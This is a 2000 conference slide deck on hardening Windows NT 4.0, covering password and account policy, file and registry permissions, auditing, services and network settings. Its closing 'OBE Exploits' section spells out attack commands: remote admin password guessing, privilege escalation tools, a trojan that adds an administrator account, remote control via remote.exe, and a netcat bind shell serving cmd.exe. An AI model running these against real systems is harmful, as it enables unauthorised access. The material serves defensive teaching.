1 CERTConf 2000 | HardenedNT NuGenSoft Hardening Systems: Windows NT Stephen M. Nugen, CISSP NebraskaCERT [email protected] Presented to CERTConf 2000

1CERTConf 2000 | HardenedNT

NuGenSoft

Hardening Systems:

Windows NT

Stephen M. Nugen, CISSP

[email protected]

Presented to CERTConf 2000September 28, 2000


NuGenSoftIntroduction

• Purpose– Discuss Windows NT-specific InfoSec issues– Provide pointers to specific checklists, etc.– Focus

• Windows NT 4.0

– Still outselling Windows 2K

– Next year: Windows 2K and/or Whistler (-> .NET)

– Server and Workstation versions

• Broad rather than deep...

– Consider multiple areas of vulnerability

– Some topics just too hard or too site-specific to cover with everything else...

• Understanding the “why” behind the vulnerability, mitigation

– Preparing for multiple variations on a theme

– InfoSec is the journey that never ends


NuGenSoftIntroduction cont’d

• Caveat– Presenting and discussing information gleamed from multiple

sources• Sources believed to be reliable

• Some sources old... some details may be OBE depending on what service packs, patches, hot-fixes have been installed at your site

– Some, but not all of these have been tested– Limitations of any single presenter...– IMPORTANT

• USE THESE NOTES ONLY AS

– IDEAS FOR FURTHER STUDY

– POINTS OF REFERENCE... KEYWORDS FOR SEARCHING TECHNET, MSDN, ETC.

• CHANGES TO REGISTRY VERY DANGEROUS

– BACKUP REGISTRY FIRST

– EXPLORE WITH REGEDT32.EXE... USE OPTIONS | READ-ONLY

– DON’T TRUST NUGEN’S SPELLING, TYPE, OR VALUE FOR ANY PARTICULAR REGISTRY KEY, ETC.... LOOK IT UP



• Assumed– Already understand InfoSec basics– Already understand Windows NT basics

• Style– Very informal– Questions and suggestions welcome anytime

• Now

• Later

• If need the source for any specific suggestion/topic, send email to [email protected]

– Ask about abbreviations... like• HKLM = HKEY_LOCAL_MACHINE• HKCU = HKEY_CURRENT_USER



• Structure– Accounts– Resources– Auditing– Services– Network– Other– OBE Exploits– Sources


NuGenSoftAccounts

• Password Restrictions– Passwords should expire after <xx> days to limit scope of

compromised password– Password length > 12 characters

• For W9X systems, password length of 8 very bad since encrypted in 7-byte chunks

– Password uniqueness• Don’t keep reusing compromised passwords

• Set Password Uniqueness to remember maximum value (24)

• Set Minimum Password Age to 2 days to prevent users from cycling through passwords to return to their “old favorite”

– Use Account Lockout to prevent password guessing, brute force• Lockout after <4-5> bad login attempts

• Reset count after <20-30> minutes

• Lockout duration (30-forever>

– If forever, then will need Administrator to restore account


NuGenSoftAccounts cont’d

• Password restrictions cont’d– User must log on in order to change password... to require

Administrator involvement for users whose passwords have expired– Password warning time

• Default: NT begins warning users 14 days before password expires• Can change via

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

– Misc advice• Constructing passwords... educating users

• Don’t forget to self-crack passwords from time to time...



• Account Policies... User Rights– Be guided by principles of

• Least privilege

• Separation of duties... illegal activity which requires collusion less probable, more likely to be detected

– Consider• Which group memberships really necessary

• Hours of use

• Dial-in access...

• Which servers users can access... be very concerned about people logging on from a computer in an unsupervised area

• Account expiration... especially for test and temporary accounts

– Some rights should not be assigned to any user• Act as part of the operating system• Create a token object• Debug programs... not auditable• Generate security audits• Replace a process level token



• MS-Recommended changes from default for high-security sites– Right: Log on locally

• Workstations and stand-alone servers

– Default: Administrators, Everyone, Guests, Power Users, and Users

– Change: Remove Everyone and Guests

• Domain servers

– No change from default recommended

– Right: Shut down system• Workstations and stand-alone servers

– Default: Administrators, Everyone, Guests, Power Users, and Users

– Change: Remove Everyone and Guests

• Domain servers

– No change from default recommended



• MS-recommended changes from default cont’d– Right: Access this computer from network

• Workstations and stand-alone servers

– Default: Administrators, Everyone, Power Users

– Change: Remove Everyone; Add Users

• Domain servers

– Default: Administrators, Everyone

– Change to: Remove Everyone; add Backup/Server/Print Operators

• Also refer to MS Windows NT 4.0 Domain Controller Configuration Checklist



• Account policies cont’d– Special considerations

• Access this computer from network

– Block for Everyone group

– For all groups when possible... including administrator... so that administrators have to login interactively at the server, in a controlled environment

• Log on locally

– Admins only... users shouldn’t be logging into actual server hardware

• Take ownership of files and other objects

– Admins only...

• Manage auditing and security logs

– Admins only...

– See following note about Auditor account



• Administrator account cont’d– Administrators need two separate accounts

• Regular use, less-privileged

– Not an insult

– A precaution against accidental damage

• System administration account

• Win2K allows “execute as” like Unix “su”

– ...Two separate accounts for other privileged accounts as well• Backup Operators, etc.



• Administrator account cont’d– Rename Administrator account to something obscure

• Exploit tools can still learn the name, but

– It’s another barrier... more tools, knowledge, etc.

– Some or all of them require the renamed administrator account be in-use... the system administrator logged-on

• Be sure to scan the audit logs for logon attempts to Administrator account...

• Be sure to hide last user name on logon via registryHKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\DontDisplayLastUserName



• Administrator account– Make a decoy Administrator account

• No permissions

• Waste the time of script kiddies

• Audit...

– Consider an Auditor account as only account in built-in Administrator Group• All other Admins in special management group with every right except

“Manage auditing and security log right”

• Allows auditing of most powerful accounts...

– Most likely account to be misused, accidentally or deliberately

– Most likely account targeted by disgruntled employee or external hacker



• Administrator account cont’d– Recovery technique

• Make obscure Administrator account with very complex password

• Store password in thirds in three different envelopes entrusted to three different managers/employees

• Audit...

– Use PASSPROP make Administrator account subject to locking policy• From NTRK

• Only locks remote access... not local


NuGenSoftAccounts cont’d• SYSKEY

– aka System Key– Background

• NT stores one-way hashes of user passwords in SAM registry

• Saved by rdisk /s and some backup programs

• Password cracking tools can dump encrypted passwords archived SAM files... for subsequent cracking

– SYSKEY encrypts the user password hashes with 128-bit key for added protection– Three modes

• Auto Boot– System generates internal key and stores it on the system– Convenient for unattended startups,– Not very secure

• Floppy Boot– System generates random key and stores it on floppy– More secure– Must insert floppy to boot the system– If you lose the floppy, order pizza...

• Password Boot– Administrator chooses password– Needed to boot– If you forget the password or lose the Administrator, order pizza...



• SYSKEY cont’d– Notes

• SYSKEY prevents SAM dumping with– Tool built into L0pht Crack 2.5– Tool pwdump

• SYSKEY does not stop SAM dumping with tool pwdump2– Uses DLL injection techniques different than pwdump– Exploits weakness in SYSKEY encryption... reuse of the keystream– pwdump2 requires administrator access– SYSKEY increases the complexity and time-required to crack

password hashes



• LANMAN (aka LanManager [LM])– LANMAN authentication for Windows 9x clients much weaker than

Windows NT authentication– Set

HKLM\System\CurrentControlSet\Control\LSA\LMCompatibilityLevel = X

– Where:• X=0: Support NT and LM password forms

• X=1: Use LM only if requested

– Vulnerability since hack tools can still request weaker LANMAN authentication

• X=2: Never use LM

– Preferred

– But no Win95/98 clients

• Consider disable caching of logon credentials– Used for roaming profiles... leaves local copies– HKLM\System\Software\Microsoft\Windows NT\

CurrentVersion\Winlogon\CachedLogonsCount


NuGenSoftResources

• Always format volumes as NTFS– FAT filesystems don’t support ACLs

• Shares– Share ACLs only restrict remote access, not access to program on

the same computer• Local access: Checks file & directory ACLs

• Remote access: Checks

– Share ACLs, then

– File and directory ACLs

– Share ACLs can’t be relaxed by share owners, but can created and modified by• Full administrators

• Server Operators

• Power Users

• Print Operators (create only)


NuGenSoftResources

• Shares cont’d– Don’t inadvertently put information in share name

• Share names visible even to users who can’t access the share

• Names like “Secret Layoff Schedule” best avoided


NuGenSoftResources cont’d

• Administrative shares (aka net shares)– Created automatically for each logical volume (e.g. C$, D$)– Hidden from view, but accessible– Helpful in remote administration– Disabled when Server service disabled– Disabled through registry keys

• NT ServerHKLM\System\CurrentControlSet\Services\LanManServer\Parameters\AutoShareServer

• NT WorkstationHKLM\System\CurrentControlSet\Services\LanManServer\Parameters\AutoShareServer

– Can delete existing shares throughnet share /d

– Multiple MS-KB articles on this subject...



• General access permissions– Start with the most sensitive directories and files...– Use tools for large systems– For shared directories and files

• Which local users and groups have access... necessary and appropriate?

• When network users and groups have access... necessary and appropriate?

• Are inherited permissions appropriate?

– For non- shared directories and files• Which local users and groups have access... necessary and appropriate?

• Are inherited permissions appropriate?

– Override the default behavior that the Everyone Group gets full access for all new folders...

• Change Everyone group access for parent folder, then create subfolders which inherit permissions

• Change Everyone group permissions at drive root... then propagating permissions to subdirectories

– Exception: Manually update systemroot folder (usually C:\winnt)



• Separate data files from program files– Easier administration... backups– Data directories

• Users given Write permissions

• Remove Execute permission... to prevent user from writing trojan or virus into directory and then executing

– Program directories• Users have Read and Execute permissions

• Remove Write permissions... to prevent user from writing trojan or virus into directory and then executing

• Separate public files from private files– Easier to apply appropriate permissions and audit

• Never share the root directory of a drive– Exception: CD-ROM shared for public access

• Use encryption when feasible– Especially for exec laptops...



• MS recommendations for protecting files and directories– \winnt and all subdirectories... see exceptions that follow

• Administrators: Full Control

• System: Full Control

• Creator Owner: Full Control

• Everyone: Read

– \winnt\repair... where rdisk stores info for ERD disks... includes sensitive info• Administrators: Full Control

– \winnt\system32\config• Administrators: Full Control



• Everyone: List



• MS file recommendations cont’d– \winnt\system32\spool




• Everyone: Read

• Power Users: Change

– \winnt\cookies• Administrators: Full Control



• Everyone:

– Special directory access: read, write, execute

– Special file access: none



• MS file recommendations cont’d– \winnt\forms

• Same protections as \winnt\cookies

– \winnt\history• Same protections as \winnt\cookies

– \winnt\occache• Same protections as \winnt\cookies

– \winnt\profiles• Same protections as \winnt\cookies

– \winnt\sendto• Same protections as \winnt\cookies

– \winnt\temporary internet files• Same protections as \winnt\cookies



• MS file recommendations cont’d– \boot.ini



– \ntdetect.com• Administrators: Full Control


– \ntldr• Administrators: Full Control


– \autoexec.bat• Administrators: Full Control


• Everyone: Read



• MS file recommendations cont’d– \config.sys



• Everybody: Read

– \temp directory• Administrators: Full Control



• Everyone:

– Special directory access: read, write, execute

– Special file access: none

• Also see specific guidelines from TSS & NSA, 1988



• Monitor ownership of sensitive files– Example: Administrators shouldn’t be accessing personnel

evaluations– Owner should deny access to administrators– If necessary, Admin can take ownership... Then, grant themselves

access rights– But, Admins can’t give ownership back to original owner... so leaves

tracks– Data owner checks ownership... finds Admin is new owner... can ask

the interesting questions– Doesn’t require auditing or access to audits by data owner



• Prevent remote registry editing– Stronger protection after SP3– Remote registry editing subject to the ACL on key

HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\Winreg

...but HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\

Winreg\Allowed Paths\machines defines registry keys exempt from this restriction

– See MS-KB Q153183– Default

• NT Server defines key, restricts remote access to Administrators

• NT Workstation doesn’t define the key, does not restrict remote access to the registry



• Disable registry tools when not required– Method-1:

HCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools

• Directly or via policy editor

– Method-2: Use ACLs to restrict use of registry editors

• Weakness of this approach: Doesn’t restrict other registry-modifying tools, scripts, etc.



• C2-level protections

– Full C2 the subject of multiple white papers, etc.

– Investigate ProtectionMode

• When present, tells the NT Session Manager that security on base system objects should be at the C2 security level

• HKLM\System\CurrentControlSet\Control\SessionManager\ProtectionMode

• Ref MS-KB Q244995

– Also investigate additional protection

• ProtectionMode doesn’t address all base named objects... for those, useHKLM\System\CurrentControlSet\Control\SessionManager\AdditionalBaseNamedObjectsProtectionMode



• Sensitive registry areas to control & monitor– Can be used to launch trojans– MS-recommended default ACLs for these registry keys



• Creator Owner: Full Owner

• Everyone: Read– HKLM\Software\Microsoft\Windows\CurrentVersion\Run– HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce– HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx– HKLM\Software\Microsoft\Windows\CurrentVersion\AeDebug– HKLM\Software\Microsoft\Windows\CurrentVersion\WinLogon



• MS recommendations for changes to registry key permissions

– Changes to default for Everyone group

• Default for Everyone: Special Access with

– Query Value

– Set Value

– Create Subkey

– Enumerate Subkeys

– Notify

– Delete

– Read Control



• MS registry recommendations cont’d

– Changes for Everyone group cont’d

• Change for Everyone Special Access

– Retain

» Query Value

» Enumerate Subkeys

» Notify

» Read Control

– Remove

» Set Value

» Create Subkey

» Delete



• MS registry recommendations cont’d– Changes for Everyone group cont’d

• Applies to

– HKLM\Software

» But don’t apply to entire subtree or some software may become unusable

– HKLM\Software\Microsoft\RPC (and subkeys)

– HKLM\Software\Microsoft\Windows NT\CurrentVersion

– HKLM\Software\Microsoft\Windows NT\CurrentVersion\Profile List

– HKLM\Software\Microsoft\Windows NT\CurrentVersion\AeDebug

– ... Too many to list... ref to MS Publication: Securing Windows NT Installation, Oct, 1997

– Don’t forget keys

» HKCR (root and all subkeys)

» HKU\.DEFAULT



• Watch out for PATHs– System PATH variable must only contain directories whose ACLs

prevent untrusted users from adding or modifying files• Such as executables and DLLs

• Such as data files trusted programs rely on

– User-level autoexec.bat files can be enabled• Registry keyHKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

• If enabled, then must protect autoexec.bat files

– The “.” problem• Most commands and APIs search the current directory (“.”) before the

directories specified in the controlled PATH variable

– Command window

– Scripts

– APIs that start other programs

• Allows untrusted programs/components/etc. to be accessed in place of trusted elements... spoofing



• Path cont’d– The “.” problem cont’d

• Difficult to protect against...

• Some advice

– Use 3rd-party command shells if feasible

– Routinely scan for executable files

» *.exe. *.bat, *.com, *.vbs, etc.

» Get real attentive when finding files whose name is the same as common commands, services, etc.

– Avoid working in directories where users with lesser capabilities can create files, etc.

» Especially important for Administrators

– Where possible, use the Start | Run... it does not search “.” before directories specified by system PATH



• DLL spoofing– Closely related to PATH issues– Goal of malicious user: cause their “special” DLL to be loaded

instead of more boring DLL supplied by the operating system or trusted application

– Difficulty-1: Rules used to load DLLs at boot time complex• Different for 16-bit and 32-bit DLLs

• Trusted source disagrees with MS-KB article

• Ref: MS-KB Q164501



• DLL spoofing cont’d– Difficulty-2: Different methods search different sequences of

directories• Program directory

– Where the executable resides

– May not be protected by default, but should be protected by good Administrator

• System directory

– Ex: c:\winnt or c:\winnt\system32

– Should be protected

• Working directory...

– Directory the user entered before starting the program

» Protected?

– Or, directory program places itself in

» Known?

» Protected?

– DLL spoofing though working directories most serious vulnerability



• DLL spoofing cont’d– Safe locations for DLLs

• DLLs in protected system directories

• Application DLLs in same directory as application, suitably protected

– Periodically scan for *.DLL files located outside of protected system and application directories

• Protect shortcuts– If a malicious user can change the properties of a shortcut...– System shortcuts (desktop and Start Menu) generally already

protected inside Profile directory, private by default– Users should be cautioned not to create shortcuts in directories not

write-protected from all others



• Extension mapping– Can easily spoof when allowed to change the association between

file types and system action– Single mapping should serve all users and only trusted programs

whose executable files are properly protected– Problem-1: Anyone can change mapping

• By default, all local users (members of INTERACTIVE pseudo-group) can modify the mapping through user tools

• Mapping stored underHKLM\Software\Classes

• Change permissions on this key

– Replace Interactive group with a one that holds only trusted users

– Restrict non-Admin write access to the command keyHKLM\Software\Classes\regfile\shell\open\command



• Extension mapping cont’d– Problem-2: Standard extensions can be dangerous

• *.reg files contain scripts executed by registry editor, making changes to the registry

• Consider disabling this association

– To avoid surprises

– Can always reassociate when needed... always record the existing association before changing it

• For high-security environments, selectively unmap every association not required for normal operations

– Very carefully, methodically, one or two at a time, with regression test scripts, etc.

– Note: Executables can be run from command line, regardless of their file extension



• Watch out for data files containing more than data– Best-known example: Macro viruses embedded in a MS-Office file– Lessor-known example: OCX embedded in a .RTF file– Lessor-known example: NTFS streams...

• NTFS files can contain multiple streams • Most tools only operate on Stream 0• Files can contain data in Stream 0; hacker tools in Stream 1; etc.

• Printer drivers– NT thoughtfully automatically installs print drivers as needed...

• Untrusted print drivers could divert the data...

• Restrict this ability to administrators, print operators and power users• HKLM\System\CurrentControlSet\Control\Print\Providers\LanMan Print Services\Servers\AddPrintDrivers



• Consider writing the system page file during clean system shutdown– HKLM\System\CurrentControlSet\Control\SessionManager\

MemoryManagement\ClearPageFileAtShutdown

– Increases duration of shutdown process

• Lock the server console when not in use

– Explicitly

– Password-protected locking screen savers

• Consider turning off auto-generation of 8.3 names– Filenames in 8.3 only needed for backward compatibility with 16-bit

applications– Turning off improves performance (don’t know how much)– HKEY\System\CurrentControlSet\Control\FileSystem\

NtfsDisable8dot3NameCreation



• Consider removing the “R” permission from executable program files– Benefit: Prevents users from copying

• Perhaps to their directory searched before the system directories

• Effectively negating the replacement of an untrusted component with a trusted component

– Problem• Desktop manager cannot determine icon for such files

– May generate an audit entry it auditing failed reads

– Displays default icon



• Consider restricting the use of DCOM– Remote interactive user write access to DCOM RunAs value

• KeyHKLM\Software\Classes\AppID

• Remove Interactive set, create, and write permissions

• Replace permissions on existing subkeys

– Disable DCOM which can be used to execute commands remotely• KeyHKLM\Software\Microsoft\Ole\EnableDCOM


NuGenSoftAuditing

• General notes– Auditing enabled through User Manager | Policies | Audit– Directory/file auditing by user (groups or accounts) controlled through

file manager• Explorer | <select file> | <right-click> | properties | security | auditing

– Printer auditing controlled through Print Manager• Print Manager | <select printer> | <right-click> | properties | security |

auditing

– Auditing of base system objects requires a new registry key• HKLM\System\CurrentControlSet\Control\Lsa\AuditBaseObjects

• Then, enable “Object Access” using User Manager


NuGenSoftAuditing cont’d

• General notes cont’d– Even with auditing privilege use, certain privileges not audited

• To control size of audit logs

• Ex: Backup and restore privileges

• If required in special circumstances, checkout– HKLM\System\CurrentControlSet\Control\Lsa\FullPrivilegeAuditing



• Set log size reasonably large– Depends on granularity of auditing, activity level, etc.... – Experiment... 4096 and 8192 commonly-cited sizes... monitor– Consider placing event logs in separate partition(s) so they never fail

because of insufficient disk space• HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Security\File

• HKLM\SYSTEM\CurrentControlSet\Services\EventLog\System\File

• HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\File

• Enable log wrapping with “Overwrite Events as Needed”– Goal: Overwrite needn’t happen with good maintenance, archives

• Routine log maintenance– Monitor size– Move to long-term storage– Clear– Know chain of evidence rules



• Special case: Security Log...– Some experts recommend never allowing Security Log to overwrite

• Better to crash than allow hacker crude method of covering their tracks

• Technique– Set “Do Not Overwrite Events”– Establish registry key HKLM\SYSTEM\CurrentControlSet\Control\Lsa\CrashOnAuditFail

• Recovery– Restart computer– Logon as local administrator– Use Event Viewer to clear all events from security log– Reset HKLM\SYSTEM\CurrentControlSet\Control\Lsa\CrashOnAuditFail

– Restart computer– Ref MS-KB Q140058

– Other experts recommend against this auto-crash since it provides a straightforward DoS



• Event logs can be compromised– Malicious users with access to powerful accounts can remove traces

of their involvement– A new tool claims the ability to make selective fine-grain

modifications to the event logs• Requires administrative rights

• See ntbugtraq for details

– So why audit: good defense consists of multiple hurdles, layers

• Restrict viewing of system and application events logs

– Low-value...– HKLM\System\CurrentControlSet\Services\EventLog\

LogName]\RestrictGuestAccess

– Remember to set security protections on the key as well

• Consider network time-synch for analyzing events across processors



• Auditing for specific threats... examples

Threat Corresponding Events to Audit

break-in using random passwords (brute-force) logon and logoff; failures

break-in using stolen password login and logoff; success (...)

misuse of administrative privileges by authorized users

use of user rights; user & group management; security policy changes; restart, shutdown

virus outbreakwrite access for targeted program files; document templates

improper access to sensitive filesfile- and object-access failure for everyone; and/or access success for suspect usr/groups



• DII-COE minimum audit requirements– Logon [F,S]– Logout [F]– Use of privileged commands [F,S]– Application and session initiation [F,S]– Use of print command [F,S]– Discretionary access control permission

modification [F,S]– Export to media [S]– Unauthorized access attempts to files [F]– System startup and shutdown [F,S]

Notation

S = SuccessF = Failure



• Auditing access to password DB– Goal: Ensure notification through Event Logger of failed and

successful access to sensitive password DB– Ref: MS KB article Q186374– Ensure auditing enabled (via User Manager | Policies)– Trick:

• Have to make registry edits within the system security context

• Start Scheduler service (as System) via Control Panel | Services

• At command prompt:– at <time> /interactive “regedt32.exe” where <time> is

current time plus a minute or so

• Run this way allows access to entire registry, including SAM and SECURITY hives

– So, be very, very careful

• Works only for local registry



• Auditing access to password DB– Audit changes to SAM Key

• Navigate to HKEY_LOCAL_MACHINE | SAM

• Select Security | Auditing | Add | Show Users

• Add SYSTEM, Domain Admins, Administrator, Backup Operators and other groups as needed (see KB article)

• Select Audit Permission on Existing Subkeys

• Select Success and Failure checkboxes for

– Query Value

– Set Value

– Write DAC

– Read Control

– Audit changes to SECURITY Key• Navigate to HKEY_LOCAL_MACHINE | SECURITY

• Repeat same steps as for SAM

– Exit registry edit, stop scheduler service


NuGenSoftServices

• Introduction– Services started at boot– Usually run in background

• Servicing requests from user programs

• Servicing requests received from the network

– Managed, by Administrators, from CP | Services– Typically use built-in powerful SYSTEM account– Often assume the identity of requesting programs (impersonation),

thus gaining capabilities beyond service’s own account

• Best advice: Strictly limit the services that run on any given computer


NuGenSoftServices cont’d

• Restrict the ability to install services– Default allows Server Operators to install services– Can restrict to full Administrators by ensuring only members of

Administrators and SYSTEM groups can modifyHKLM\System\CurrentControlSet\Services\Schedule

• Restrict scheduling capabilities– Consider removing the key

HKLM\System\CurrentControlSet\Control\Lsa\SubmitControl

• Allows Server Operators to install scheduler jobs

• Also allows Server Operators to expand their capabilities to full administrators

– Restrict access toHKLM\System\CurrentControlSet\Services\Schedule

• To same users/groups allows to submit jobs to schedule service



• Restrict FTP– Default account is Guest

• Which should already be disabled

• Configure for new account with password, not a member of any privileged groups

• Configure home directory carefully...

– FTP server exports entire disk partitions

– Administrator can configure which partitions are accessible via FTP, but not which directories

– So, assign a complete disk partition as the FTP store, making that partition accessible only via FTP



• Port scans... use tools on own network to detect which services are responding– Log– Analyze

• Against a checklist

• Pay special attention to changes since last scan

• System Account– This sometimes is the default, even when not needed– Check with vendors– Experiment running some services from a less privileged account

• Create local account, e.g., “Unprivileged Service” with random 14-character password

• Deselect “User Must Change Password at Next Logon”

• Select “Password Never Expires”

• Assign necessary Rights

– Don’t add account to local administrator’s group...

• Edit Service properties to run from this new account instead of System


NuGenSoftNetwork

• Domains and trust relationships– Site-specific, so outside the scope of this discussion– Be sure to protect NETLOGON directory and subdirectories with

appropriate ACLs– See references

• Sutton, 1997

• TSS & NSA, 1998

• Multiple other...

• DNS– Outside the scope of this discussion


NuGenSoftNetworks cont’d

• Remote Access– Another topic too complex for fair treatment– Considerations for securing remote access include

• Physical connection... vulnerability to wiretapping at multiple points

• Protocols

• Authentication

• Cryptographic protection of data exchanges

– Technology choices include• RAS

• VPN

• Remote control programs



• <Explain multi-protocol, bindings>• Whenever possible, unbind NetBIOS from TCP/IP• Disable IP Routing



• SMB Signing– Introduction

• SMB is Microsoft’s native network sharing protocol

• SMB signing is cryptographic technique to protect against session-hijacks, replay

• Does not encrypt/protect user data

– Encryption uses user password as encryption key• Effective protection the lesser of 40-bits (128-bits) and key space of user

password

• User password of 7-characters, purely random has an effective key space of about 40-bits

– SMB sessions can be monitored, so captured traffic can be used for brute-force attack on passwords• Best security practice: Don’t use SMB services over insecure networks

– Problem: Not all SMB servers use SMB signing• Some require the transmission of the user’s password in plaintext

• Example: Non-CHAP-enabled SAMBA servers



• SMB signing cont’d– Require SMB signing by clients and servers through HKLM\System\

CurrentControlSet\Services\Rdr\Parameters\EnableSecuritySignatureand HKLM\System\CurrentControlSet\Services\Rdr\Parameters\RequireSecuritySignature

– Prevent NT from sending user passwords in plaintext... by ensuring the following key does not exist:HKLM\System\CurrentControlSet\Services\Rdr\Parameters\EnablePlainTextPassword


NuGenSoftNetwork cont’d

• Restrict anonymous network access– To registry (after SP3)

• HKLM\System\CurrentControlSet\Services\LanManServer\Parameters\NullSessionPipes


– To lookup of account names, groups, network shares• HKLM\System\CurrentControlSet\Services\Lsa\RestrictAnonymous




• RAS notes– RAS uses RC4 encryption algorithm

• User password part of the key, so must be strong

• Recommended: Use Administrator-generated random keys

– Recommended: RAS on a dedicated domain controller• Limit access just to RAS server

– Can’t remotely access resources on (internal) network connected to RAS server

» Controlled through key HKLM\Systems\CurrentControlSet\Services\RemoteAccess\Parameters\NetbiosGateway managed through RAS Setup program

– Put home directory on RAS server

» Enable one-way trust by RAS server of local workstation domain

» Local access possible through network

• Minimize services to bare minimum

• Audit as much as you can stand...



• Configure SNMP– If required, otherwise delete– Control Panel | Network | Services | SNMP Service | Security– Unless otherwise required, configure each community name for

READ ONLY– Restrict permissions on SNMP registry key

• Default gives Everyone access

• Restrict to Administrators and other authorized users

– KeyHKLM\System\CurrentControlSet\Services\SNMP\Parameters

– Change community name from default ‘public’ to someone more obscure• Src: NAI security advisory #30

• Analyzing listening ports... surprisingly hard... no good tools!


NuGenSoftOther

• Disable other boot media– Password-protect BIOS– Change boot sequence to fixed hard disk only (no floppy, no CD-

ROM)

• Multiple copies of NT installed– Emergency copy– Ensure it is well-protected– Note

• Built-in users and groups have same identify on all NT systems

• ACLs that hold only those identified are properly enforced by all co-resident copied of NT


NuGenSoftOther cont’d

• Remove POSIX subsystem– Removal required for C2 because POSIX not included in the

evaluated system– Potential vulnerabilities in how POSIX and WindowsNT handle

filename case• POSIX always distinguishes between ‘abc.dll’ and ‘ABC.DLL’

• Win32 applications usually case-insensitive

– Delete• HKLM\System\CurrentControlSet\Control\Session Manager\SubSystems\Optional

• HKLM\System\CurrentControlSet\Control\Session Manager\SubSystems\Optional\Posix



• Remove OS/2 subsystem– Delete all subkeys in

HKLM\Software\Microsoft\OS/2 Subsystem for NT– Delete

• HKLM\System\CurrentControlSet\Control\Session Manager\Environment\Os2LibPath

• HKLM\System\CurrentControlSet\Control\Session Manager\SubSystems\Optional

• HKLM\System\CurrentControlSet\Control\Session Manager\SubSystems\Optional\Os2

– Delete \winnt\system32\os2 directory and all subdirectories

• Remove Windows on Win32 (WOW)



• Consider disabling user access to floppy and CD-ROM drives– Reason

• Guard against (accidental) introduction of viruses, trojans, etc.

• Complicate data theft

– Constraints• Can restrict access to local user (no sharing)

– HKLM\Software\CurrentVersion\Winlogon\AllocateFloppies– HKLM\Software\CurrentVersion\Winlogon\AllocateCdRoms

• Can restrict access even to local user

• Can lock

• Can remove

– Disable CD-ROM Autorun• Registry keyHKLM\System\CurrentControlSet\Services\Cdrom\Autorun

• May interfere with some installs... some CD-R services



• Display legal notice before logon– Not a technical countermeasure, but a method of reminding users of

policy– Put whatever you want into the message box for registry keys:

• HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption

• HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText

• Always use Secure Attention Sequence– Three-finger salute to invoke Security Window

• Logon, logoff, shutdown, etc.

– Security monitor dialog, already displayed, may be a trojan


NuGenSoftOBE Exploits

• These should be OBE... already or after you update your configuration

• Discussed only in terms of reinforcing earlier notes• Getting administrator password

– NT architecture with even default settings severely restricts what remote users can do... unless they are using an account in the Administrator’s group

– Hackers tend to target local Admin accounts• Local admins more likely to weaker passwords than domain admins

– Guessing still works... ex• net use \\1.2.3.4\IPC$ * /user:Administrator

– Specifying (*) for password causes the remote system to prompt for it

• Type the password for \\1.2.3.4\IPC$ :• billg• The command completed successfully


NuGenSoftOBE Exploits cont’d

• Admin password cont’d– Guessing cont’d

• Usernames are oftentimes obvious from email, etc.

• Usernames can be enumerated through anonymous connections via net use

• Scripts (tools) can used to automatically guess passwords remotely

– Ex: Legion, NAT, NTInfoScan, SMBGrind

• Countermeasures: – MS patch– Good passwords,– Dummy Admin account– Audit and monitor failed logons

• Privilege escalation– getadmin

• Adds a user to the local Administrator’s group

• Uses a low-level NT kernel routine and DLL injection to insert its code into Winlogon

• Requires local access



• Privilege escalation cont’d– sechole

• Adds current user to the local Administrator group

• Modifies the instructions in memory of the OpenProcess API call so that it can successfully attach to a privileged process, regardless of whether it has the necessary permissions

• Once attached, works like getadmin

• Requires local access

• Updated sechold adds current user to Domain Admins group



• Privilege escalation cont’d– sechold cont’d

• With IIS, sechole can be launched remotely to add internet user’s account to Administrator or Domain Admin group

– First, find an IIS directory that is both writeable and executable... lists exist

– Upload executables and associated DLLs for sechole, cmd.exe, and ntuser

– Execute sechole through a URL that references it

– Then execute ntuser to add new user... through URL targeting cmd.exe

• Countermeasures

– MS patch

– Do not allow write access to executable directories on IIS

– Audit execute privileges

– Disable Windows file sharing on IIS Server... block TCP and UDP on ports 135-139



• Simple trojans– Ex: Hacker replaces regedit.exe in winnt/system32 with regedit.cmd– Admin calls ‘regedit” from the command line– Batch file does something likenet localgroup administrators <billg> /addand then invoke the real regedit.exe

– Countermeasures• Appropriate permissions on trusted directories like winnt/system32

• Programs launched through registry settings– Entries in registry areas like HKLM\Software\Microsoft\Windows\

CurrentVersion\Run

– Countermeasures• Appropriate permissions on the registry keys

• Monitor changes to these areas


NuGenSoftOBE Exploits

• Using NT Resource Kit tools for remote control– Tools

• Remote Command Service (rcmd.exe and rcmdsvc.exe for client and service)

• Remote Command Line (remote.exe)

– Can be launched in client or server mode

– More popular

• Service controller (sc.exe)

– Step-1: Copy remote.exe to executable path on target• Connect to admin share C$ as Admin

• Copy remote.exe to winnt/system32... well-hidden there among all the other executables

• Counters: Delete admin shares, protect Admin account



• NTRK tools cont’d– Step-2: Start schedule service on target system

• sc \\1.2.3.4 start schedule• net time \\1.2.3.4

– So can schedule remote.exe in Step-3

• Counters: Disable schedule service

– Step-3: Launch instance of remote.exe as service on target• at \\1.2.3.4 <time> “remote /s cmd secret”

– Where <time> = result from Step-2 net time + 1-2 minutes

• check withat \\1.2.3.4



• NTRK tools cont’d– Step-4: Enjoy remote control

• [Attacker]: remote /c 1.2.3.4 secret• [Response]: <snip> Connected..

C:\ {command prompt on remote target machine}

• [Attacker]: dir wintnt\repair\sam• [Response]: {file attributes of sam file on target}

• [Attacker]: @q• [Response]: *** SESSION OVER ***

– Server is still running on remote target computer



• Netcat... another remote control tool– Step-1: Launch netcat on target machinenc -L -d -e cmd.exe -p 8080• -L makes the listener persistent across multiple connection breaks

• -d runs netcat in stealth mode... no interactive access

• -e specifies the program to launch... cmd.exe in this example

• -p specifies what port to listen on... port 8080 in this example

– Step-2: Enjoy remote access• [Attacker]: nc 1.2.3.4 8080• [Response]: {Command shell prompt on remote target machine}

• [Attacker]: ipconfig• [Response]: {information about the remote machine’s ethernet adapter}

• [Attacker]: exit

